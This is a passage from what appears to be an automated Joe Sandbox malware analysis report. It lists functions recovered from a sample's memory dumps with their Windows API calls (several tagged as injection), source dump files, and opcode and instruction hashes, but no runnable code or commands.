513->514 515 70b5a0c-70b5a22 514->515 516 70b5a07 514->516 518 70b5a29-70b5a48 515->518 519 70b5a24 515->519 516->515 520 70b5a4a-70b5a50 518->520 521 70b5a52 518->521 519->518 524 70b5a55-70b5ac3 520->524 521->524 525 70b584e-70b585d 522->525 523->525 532 70b5acd 524->532 533 70b5ac5-70b5acb 524->533 525->482 534 70b5ad0-70b5ad8 532->534 533->534 534->482
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B5666
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 323824b51faa2fc7d5972354d68ec63ddd58ba8189e493db350639126ea7cf15
                                                  • Instruction ID: 2c2cfc41f09659f0bc830c2a47e76e80bd616c9d9f798f179a67a8e4bd8fc14d
                                                  • Opcode Fuzzy Hash: 323824b51faa2fc7d5972354d68ec63ddd58ba8189e493db350639126ea7cf15
                                                  • Instruction Fuzzy Hash: 2C613DB1E002198BDB14DFA9C9406EEFBF6EF89311F24C1A9D418AB355D7349A42CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025F5D0D Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 536 25f5d0d-25f5d0e 537 25f5d12 536->537 538 25f5d10-25f5d11 536->538 539 25f5d16 537->539 540 25f5d14 537->540 538->537 541 25f5d18-25f5dd9 CreateActCtxA 539->541 540->539 543 25f5ddb-25f5de1 541->543 544 25f5de2-25f5e3c 541->544 543->544 551 25f5e3e-25f5e41 544->551 552 25f5e4b-25f5e4f 544->552 551->552 553 25f5e51-25f5e5d 552->553 554 25f5e60 552->554 553->554 555 25f5e61 554->555 555->555
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 025F5DC9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 3dd380ae699f6b7d17d20a84e58deba9a555238e9ebad720df12a4f04a6fee2a
                                                  • Instruction ID: 5f9120ba669c1f2897ef62c37c50f22c88df257b07a9fee07c403798d6403dcb
                                                  • Opcode Fuzzy Hash: 3dd380ae699f6b7d17d20a84e58deba9a555238e9ebad720df12a4f04a6fee2a
                                                  • Instruction Fuzzy Hash: F241F1B1C01719CFEB24DFA9C8847DEBBB5BF88704F60816AD508AB251EB715946CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025F4538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 557 25f4538-25f5dd9 CreateActCtxA 560 25f5ddb-25f5de1 557->560 561 25f5de2-25f5e3c 557->561 560->561 568 25f5e3e-25f5e41 561->568 569 25f5e4b-25f5e4f 561->569 568->569 570 25f5e51-25f5e5d 569->570 571 25f5e60 569->571 570->571 572 25f5e61 571->572 572->572
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 025F5DC9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 3f78d706c91ceba9ad71e72df1088e42ee226551bbe94b08f30008d334957f62
                                                  • Instruction ID: 1384c4fa8a3f2d30e974ec23f0121eeb9cf08bf07a924674bfe549d0baf6d2eb
                                                  • Opcode Fuzzy Hash: 3f78d706c91ceba9ad71e72df1088e42ee226551bbe94b08f30008d334957f62
                                                  • Instruction Fuzzy Hash: 5341C1B1D00719CFEB24DFA9C884B8EBBB5BF88704F60816AD508AB251EB755945CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05349ED8 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 574 5349ed8-5349f2c 576 5349f37-5349f46 574->576 577 5349f2e-5349f34 574->577 578 5349f48 576->578 579 5349f4b-5349f84 DrawTextExW 576->579 577->576 578->579 580 5349f86-5349f8c 579->580 581 5349f8d-5349faa 579->581 580->581
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05349F77
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584604125.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5340000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: 35ed89a2e35d7b784d02f4e7093a0f3ec2b7421afaa65b25decec59bac0db202
                                                  • Instruction ID: 9c0a2131d478d7a966ea58046e4352c0d6ca7ac99845c5fa441e928c202906d2
                                                  • Opcode Fuzzy Hash: 35ed89a2e35d7b784d02f4e7093a0f3ec2b7421afaa65b25decec59bac0db202
                                                  • Instruction Fuzzy Hash: 4731EEB6D003099FDB10CF9AD880ADEFBF4FB58320F14842AE919A7210D775A945CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05349EE0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 584 5349ee0-5349f2c 585 5349f37-5349f46 584->585 586 5349f2e-5349f34 584->586 587 5349f48 585->587 588 5349f4b-5349f84 DrawTextExW 585->588 586->585 587->588 589 5349f86-5349f8c 588->589 590 5349f8d-5349faa 588->590 589->590
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05349F77
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584604125.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5340000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: fd71b8bfa0a261e7134d61105c382846133c8a6425b2d4caf3ce8b2613e50746
                                                  • Instruction ID: dcf060320e1b73b93fac9bdeeb96574b1c6a6ac2d4ef312f674bc52572520bef
                                                  • Opcode Fuzzy Hash: fd71b8bfa0a261e7134d61105c382846133c8a6425b2d4caf3ce8b2613e50746
                                                  • Instruction Fuzzy Hash: DE21CEB69003099FDB10CF9AD884A9EFBF5BB58320F14842AE919A7210D774A944CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B5BB8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 593 70b5bb8-70b5c06 595 70b5c08-70b5c14 593->595 596 70b5c16-70b5c55 WriteProcessMemory 593->596 595->596 598 70b5c5e-70b5c8e 596->598 599 70b5c57-70b5c5d 596->599 599->598
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070B5C48
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: bcd4bfe0d54bf089c855a58aea83af6fb38735dfd2581caf14924d2458f55812
                                                  • Instruction ID: ab70f5a037d398b3b51aba12d7cad67587ae5b1f3abd6a617eba53fa6827aff1
                                                  • Opcode Fuzzy Hash: bcd4bfe0d54bf089c855a58aea83af6fb38735dfd2581caf14924d2458f55812
                                                  • Instruction Fuzzy Hash: 1F2125B190030A9FDB10DFAAC885BDEBBF5FF48310F10842AE918A7240D7799955DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025FE1A0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 603 25fe1a0-25fe1a2 604 25fe1a6-25fe23c DuplicateHandle 603->604 605 25fe1a4 603->605 606 25fe23e-25fe244 604->606 607 25fe245-25fe262 604->607 605->604 606->607
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025FE22F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 068eb5b44c03041d340123373b999b6af7f780a07e04071d004d75355094aada
                                                  • Instruction ID: e4c35651ed81192779c7f8d2f8a12f3c66e771f877eca89fd674f24dd9e2a137
                                                  • Opcode Fuzzy Hash: 068eb5b44c03041d340123373b999b6af7f780a07e04071d004d75355094aada
                                                  • Instruction Fuzzy Hash: 8021F4B59002089FDB10CF9AD585ADEBBF5FB48310F14805AE914A7310D374A941CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B5CA0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 610 70b5ca0-70b5d35 ReadProcessMemory 614 70b5d3e-70b5d6e 610->614 615 70b5d37-70b5d3d 610->615 615->614
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070B5D28
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 2fe287126e5801a15f1a3c222fb9008338b2dd8d6f48b7ee6c480bc8d2177c40
                                                  • Instruction ID: ae6979eb15a247caea3029bad61f9da83f5c70634ff670bef521d81a70c58380
                                                  • Opcode Fuzzy Hash: 2fe287126e5801a15f1a3c222fb9008338b2dd8d6f48b7ee6c480bc8d2177c40
                                                  • Instruction Fuzzy Hash: 1D2127B18003499FDB10DFAAC844BDEBBF5FF48310F50852DE558A3240C7799510DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B55E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B5666
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c8f747269ad61bdca09212b399d4c66760619987182b1a5b046d48d3a657ebce
                                                  • Instruction ID: c79821adb665e05fa391ba28371380d33e0ff948f11066a5330b9522ab32ef46
                                                  • Opcode Fuzzy Hash: c8f747269ad61bdca09212b399d4c66760619987182b1a5b046d48d3a657ebce
                                                  • Instruction Fuzzy Hash: 0F2129B1D003098FDB10DFAAC8857EEBBF4EF88614F14842DD559A7240DB789A45CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B55E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B5666
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 2144c5e48edd355dfe5d8b99c948d726c5f222a523b963d5bb3eeb94669de2cb
                                                  • Instruction ID: 89649eeb6bd34ffe1589b314098108ab419a1a96a11d5e631cb23d0cbef7b634
                                                  • Opcode Fuzzy Hash: 2144c5e48edd355dfe5d8b99c948d726c5f222a523b963d5bb3eeb94669de2cb
                                                  • Instruction Fuzzy Hash: 53213AB190030A9FDB10DFAAC8847EEBBF4AF88324F14852DD559A7240C7789A45CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B5CA8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070B5D28
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 64ffb41278919a3b8ed7f1b6f6c95ab96746e748bdee848f298f820bf0cebe3e
                                                  • Instruction ID: 2565aa7313e8e1f3f22c583faf924d9781fd4a242bfa585ac1dc021eed3c8a5d
                                                  • Opcode Fuzzy Hash: 64ffb41278919a3b8ed7f1b6f6c95ab96746e748bdee848f298f820bf0cebe3e
                                                  • Instruction Fuzzy Hash: 6A2116B18003499FDB10DFAAC884BDEBBF5FF48310F508529E518A7240C7799510DBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025FE1A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025FE22F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 52c970d24a0c3cd698c7420772a70feb66d8e6210c4516896386b7c28464acf8
                                                  • Instruction ID: 26a116f011fa56b3bf58a3d5881dc4d23b853c3235b541672398036a2d01de0e
                                                  • Opcode Fuzzy Hash: 52c970d24a0c3cd698c7420772a70feb66d8e6210c4516896386b7c28464acf8
                                                  • Instruction Fuzzy Hash: 8821C4B59003499FDB10CFAAD984ADEFBF9FB48310F14841AE954A3350D374A954CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B5AF0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070B5B66
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 2e7b500dd08226b12103c46d981c03b9ef5efae2d6c92e73218ba3d0630db1d0
                                                  • Instruction ID: 38d660306c2797245ccedffe5e357d2349a083242d2bb9262831e18029373473
                                                  • Opcode Fuzzy Hash: 2e7b500dd08226b12103c46d981c03b9ef5efae2d6c92e73218ba3d0630db1d0
                                                  • Instruction Fuzzy Hash: C71147B19003099FDB20DFAAC844BDEBFF6AF88310F248819E515A7250C7759951DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025FC138 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025FBF99,00000800,00000000,00000000), ref: 025FC1AA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 0ae2c7a6ac9f2018ed8f1bfc5ae92d353335fba9d70c274ccf974cc66e8296da
                                                  • Instruction ID: 600b57fbf81e2110ecbe63a44b0a42993adf00a7202ba2733c29442277d7d892
                                                  • Opcode Fuzzy Hash: 0ae2c7a6ac9f2018ed8f1bfc5ae92d353335fba9d70c274ccf974cc66e8296da
                                                  • Instruction Fuzzy Hash: 5C11F2B6C003098FDB10CF9AC844BDEBBF4AB98224F14842AD559A7610C375A545CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025FB6C8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025FBF99,00000800,00000000,00000000), ref: 025FC1AA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 3f16ea85b0f1d0acc6229174e8198c6eb4ef8fd3b1275bf96312fe308b707e3c
                                                  • Instruction ID: 1c6bd8af9d70dfbc2389ab082161a504319cc1a21feb7307e488c2f7386504d3
                                                  • Opcode Fuzzy Hash: 3f16ea85b0f1d0acc6229174e8198c6eb4ef8fd3b1275bf96312fe308b707e3c
                                                  • Instruction Fuzzy Hash: 9F1103B69003099FDB20DF9AD844BDEFBF4BB98210F10842EE519A7200C375A545CFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B5AF8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070B5B66
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: adfa4bfe8ff87b387a5e34ed0aca4118df3faddc71d7101d2c79f6fc78636377
                                                  • Instruction ID: 6457039a7240fc1bf3cb430c2a9f4b37fa73317dd2b1af02d4a84538ec758e64
                                                  • Opcode Fuzzy Hash: adfa4bfe8ff87b387a5e34ed0aca4118df3faddc71d7101d2c79f6fc78636377
                                                  • Instruction Fuzzy Hash: 3F1134B18003499FDB20DFAAC844BDEFBF5EF88720F148819E519A7250CB75A950DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B5530 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 9d659e8834dbc36120f6906a6bd952f13b40390f12722a29356ffb077941f7bc
                                                  • Instruction ID: 09f34e122d7b51f0cf5e2ecc66d4f8a0f95d8d8d024fd1757002ae810984c426
                                                  • Opcode Fuzzy Hash: 9d659e8834dbc36120f6906a6bd952f13b40390f12722a29356ffb077941f7bc
                                                  • Instruction Fuzzy Hash: 011158B19003098FDB24DFAAC4847EEFBF5AF88210F248819D419A7250CB799905CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B5538 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 1bf247cc355a10d071b0513c03844449ad180d038d1787fe4059480ccd580963
                                                  • Instruction ID: 67450d86f7e9f925daca0227eac6f88675d8e9fa0697ea9643cb7a08d3138c57
                                                  • Opcode Fuzzy Hash: 1bf247cc355a10d071b0513c03844449ad180d038d1787fe4059480ccd580963
                                                  • Instruction Fuzzy Hash: FC113AB19003498FDB20DFAAC8457DEFBF5AF88620F148819D519A7240CB79A544CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025FBEB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 025FBF1E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 21c1cda5671a0199bb5994494d48cf4815333bdb103a491d2b0bc7485f27dee3
                                                  • Instruction ID: b7183f7da8de7c98f6065745789c118f2b1c7a00a5639e047e7ed21a3224566f
                                                  • Opcode Fuzzy Hash: 21c1cda5671a0199bb5994494d48cf4815333bdb103a491d2b0bc7485f27dee3
                                                  • Instruction Fuzzy Hash: 3C110FB6C003498FCB20CF9AD444BDEFBF4AB88328F11841AD528A7210C379A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B6B10 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 070B98CD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: fe87fb4ab66bcb87489f599c85c95f869da97e5cb6e9eb5dacf87062cea6470c
                                                  • Instruction ID: 83ba9413e903280a9a688a7160761ae2c61e38d337321d44900a26c5c9d79314
                                                  • Opcode Fuzzy Hash: fe87fb4ab66bcb87489f599c85c95f869da97e5cb6e9eb5dacf87062cea6470c
                                                  • Instruction Fuzzy Hash: 4A11F5B5800349DFDB20DF9AD444BDEBBF8EB48320F108519E554A7200C375A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070BA560 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 070BA58F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ebc7a263249f9005f27c44d729fc61ce50131e2624a26e85cd643fcfc44b8c7b
                                                  • Instruction ID: 37414f424604e3fb4e95be9848be028413c97c52437262557e27131e55b45aa6
                                                  • Opcode Fuzzy Hash: ebc7a263249f9005f27c44d729fc61ce50131e2624a26e85cd643fcfc44b8c7b
                                                  • Instruction Fuzzy Hash: 82F034F0E4020ADFC764EFA8C849BAEBBF0BB05204F508669C414E3250D7748645CF84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAC350 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O};5
                                                  • API String ID: 0-3558557551
                                                  • Opcode ID: 829d7ffce80c99321fb7d9a1118349eb7e4766cf149778d72591d37bf15de4c3
                                                  • Instruction ID: e62764eb58a37efb7e6a80756bdf7ab7858e9463d35f86f7754d8d6e2a9bd480
                                                  • Opcode Fuzzy Hash: 829d7ffce80c99321fb7d9a1118349eb7e4766cf149778d72591d37bf15de4c3
                                                  • Instruction Fuzzy Hash: 9E416E70A14709DFDB84CFA9D5898AEFFF5FB89300F609895D445AB324D730AA21CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895084B Relevance: .4, Instructions: 410COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 832496ee2e75cc3ae3bf298145f9de2d5de5b8939f3e9a950b8736bcdc4be084
                                                  • Instruction ID: bd11aa638befe8b3849a4618770df9154e706486239f1061b0b607aad19c7d93
                                                  • Opcode Fuzzy Hash: 832496ee2e75cc3ae3bf298145f9de2d5de5b8939f3e9a950b8736bcdc4be084
                                                  • Instruction Fuzzy Hash: 7B021730700605DFDB44EF68D498A6DBBF2BF89715F5585A8E8099B366CB30EC86CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08952768 Relevance: .3, Instructions: 302COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7764175dee3a38d78ca0b0ee789e6ca5ccb1f79d9adc44ada091da85f3454aed
                                                  • Instruction ID: 3fbea8ba91030d6d6805674f2a67085db167afbe1cce6b8fb8caa01f5f2a78d7
                                                  • Opcode Fuzzy Hash: 7764175dee3a38d78ca0b0ee789e6ca5ccb1f79d9adc44ada091da85f3454aed
                                                  • Instruction Fuzzy Hash: D0C1F935B00214CFDB14EFA8D558A9DBBF1BF89715F2545A8E806AB3A1DB31EC41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08952F10 Relevance: .2, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
